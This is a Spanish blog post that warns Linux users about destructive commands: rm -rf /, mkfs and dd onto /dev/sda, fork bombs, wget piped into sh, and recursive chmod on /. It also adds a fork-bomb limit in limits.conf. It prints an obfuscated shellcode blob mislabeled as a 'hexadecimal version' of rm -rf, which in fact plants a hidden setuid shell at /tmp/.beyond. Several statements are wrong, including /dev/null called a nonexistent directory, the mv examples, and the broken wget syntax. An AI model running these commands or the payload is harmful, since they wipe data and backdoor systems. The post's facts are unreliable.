sábado, 1 de septiembre de 2012




Todos los que conocemos GNU/Linux  sabemos que con la cuenta de root podemos hacer muchas maravillas así como grandes desastres, y es por eso que muchas distribuciones limitan el acceso a esta cuenta o incorporan shells adicionales para modificar cambios peligrosos en el sistema.

Existe una serie de comandos que han ganado fama por su capacidad de daño:

1) Eliminar casi todo

# rm -rf /

Al ejecutar este comando se borraran casi todos los archivos de sistema(salvo los archivos de procesos en la carpeta /proc

versión hexadecimal:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

 2)Formateo del sistema

# mkfs.ext3 /dev/sda

Formatea el disco o dispositivo sda , con la desaparición de todos los archivos presentes en él

3) Bomba Fork


Una bomba fork es una forma de ataque del tipo DoS (causa que un servicio o recurso sea inaccesible a los usuarios) que implementa la operación fork (creación de una copia de sí mismo), o alguna funcionalidad equivalente mediante la cual un proceso es capaz de crear otro proceso.

Resumiendo, una bomba fork es un proceso que se copia a si mismo muchas veces para colapsar tu sistema. Y aclarando falsos mitos, no es una bomba lógica, ni tampoco un fallo del kernel, ni mucho menos se trata de algo liberado por uno de los programadores del kernel.

:(){:|:&};:
 
Aunque puede tener varias, como por ejemplo:

$ ubunteate(){ ubunteate|ubunteate& };ubunteate

Pero tal cosa podemos prevenirla, editando el archivo adecuado:

$ sudo gedit /etc/security/limits.conf

Ahora localizaremos, al final del archivo, la siguiente línea:

# End of file

Pues justo encima de esa, podemos introducir la siguiente línea:

* hard nproc 1000

Quedando así las dos últimas líneas del archivo:

* hard nproc 1000
# End of file

Guardamos y cerramos el archivo y listo.

4) Colapsar el Sistema de Archivos

 Si ejecutamos:

# cualquier-comando > /dev/sda

Como por ejemplo:

# ls > /dev/sda

Con este comando, se envían bloques de datos al dispositivo indicado, lo cual a menudo puede colapsar el sistema de archivos, dando como resultado una perdida total de datos.


5) Ejecutar un script de forma automática

En algunos foros linuxeros nos dicen que descarguemos un script con el siguiente código:

$ wget http://web.com/script.sh O | sh

O peor aún, como root:

# wget http://web.com/script.sh O | sh

lo que hace este comando es descargar y ejecutar inmediatemente el script. Imaginense si uno de esos scripts contiene uno de los comandos que explico acá
uds. tendrían su sistema GNU/Linux, MacosX o cualquier derivado de UNIX ya destruído. Recomiendo sólo descargar el código y examinarlo antes de ejecutarlo y obtenerlo sólo de fuentes confiables.

6)Mover un archivo

EL comando mv sirve para cambiar la ubicación de un archivo

$ mv directorio-o-archivo-a-mover directorio-al-que-mover

Como por ejemplo:

$ mv ~/script.sh ~/Documentos

Pero debes evitar que el directorio destino  sea /dev/null, pues es un directorio inexistente, y jamás podrás obtener de nuevo esos archivos, por ejemplo:

$ mv ~/script.sh /dev/null

Eso hará desaparecer para siempre el script. Pero aún es peor si ejecutas, por ejemplo:

$ mv ~ /dev/null

Lo cual eliminará para siempre tu carpeta de usuario, con tus imágenes, vídeos, música, documentos, etc. Podemos comprobar la no existencia de ese directorio, vayamos primero al directorio /dev, el cual, supuestamente aloja null.:

$ cd /dev

Lo cual no genera ningún problema, y vamos a buscar ahora null:

$ ls

Lista demasiado grande para ponerse a buscar, mejor facilitarnos la vida:

$ ls | grep null


Si nos devuelve null, que lo hará, es que existe, pero eso no nos confirma que sea una carpeta, para ello utilizaremos:

$ ls -d

Que solo nos mostrará las carpetas, aunque también podemos filtrarlo por la palabra null:

$ ls -d | grep null

Y no les devolverá nada, porque no ha encontrado null como carpeta. Aún puedes probar:

$ cd null

Y nos dirá que no es un directorio. Por lo tanto, fijarse bien cuando se mueva algo.

7) Rellenar el Disco Duro

 También disponemos de un comando en Linux:

# dd if=/dev/urandom of=/dev/sda

Que simplemente rellena con datos aleatorios todo el espacio vacío en el disco duro, lo cual, como podemos imaginar, genera un caos tremendo en el sistema.

8) Te doy permiso para lo que quieras

También debemos de tener cuidado a la hora de dar permisos a los directorios y a las carpetas, como por ejemplo:

# chmod -R 777 /

Este comando da permisos totales a todos los directorios del sistema, ya que el comando chmod es el encargado de dar permisos, la opción R da permiso a todo lo contenido en el directorio, 777 es el mayor permiso posible, realmente inseguro y, la barrita, como dijimos anteriormente, es todo el sistema. Esto daría permiso a cualquier agente de hacer lo que sea con tu sistema, cuidado con el trío de los 7 y dónde los aplicas.

9) Te quito todos los permisos

# chmod -R -777 /

Este comando es el inverso del anterior , quita todos los permisos a todos los usuarios
y al ejecutarlo lo que tendrán será un hermoso  signo ">" como shell y no podrán realizar nada. Este error lo cometió un ex-jefe mío en la empresa de Supermercados en la que yo trabajaba : en vez de denegar permisos a una carpeta específica , durante la instalación del Sistema de Ventas, denegó el acceso a la raíz y esto lo hizo en aquellos años en un servidor con Red Hat 9, llevándose consigo las "felicitaciones" del Sub-Gerente de Informática.

Pero yendo de nuevo al tema, otra variante es  la de los tres ceros:

# chmod -R 000 /

Similar a la anterior elimina todos los accesos privilegiados a los usuarios en el sistema


Fuente:


0 comentarios:

Se ha producido un error en este gadget.

segunda mano

Blog Flux

Computers Blog Directory

BlogUpp!

Directorio de Blogs

Directorio de Blogs

About Me

Mi foto
Patricio Morales

Ingeniero de Ejecución en Informática y Técnico en Electrónica Industrial con amplia experiencia en el área de Soporte Técnico Computacional. Entre mis antecedentes destacan: Haber trabajado como Soporte Técnico por 4 años desde 2003 hasta 2007 para Empresas Bravo CAS LTDA, que en aquel entonces ofrecía soporte administrativo para las Cadenas de Supermercados BRYC (hoy Unimarc), Mayorista 10,además de Abarrotes CD(Distribuidora) y Maspan S.A(Panificadora). En 2008 trabajé como Soporte Técnico para un contratista de SONDA S.A., tiempo en el cual me correspondió atender a varias empresas de carácter regional y nacional. Desde el 2009 trabajo como Coordinador de Informática para el Departamento de Educación(DAEM) de la I. Municipalidad de Temuco. Además he trabajado de forma particular, realizando diversos trabajos en el área de Soporte Informático y en el área de relatorías para particulares y empresas.

En lo personal, me considero una persona que le gusta algo nuevo cada día, investigar sobre varios temas, que no tengan que ver con la informática y la electrónica (hay vida mas allá de los bits).

Ver todo mi perfil

Seguidores

contador de visitas

View My Stats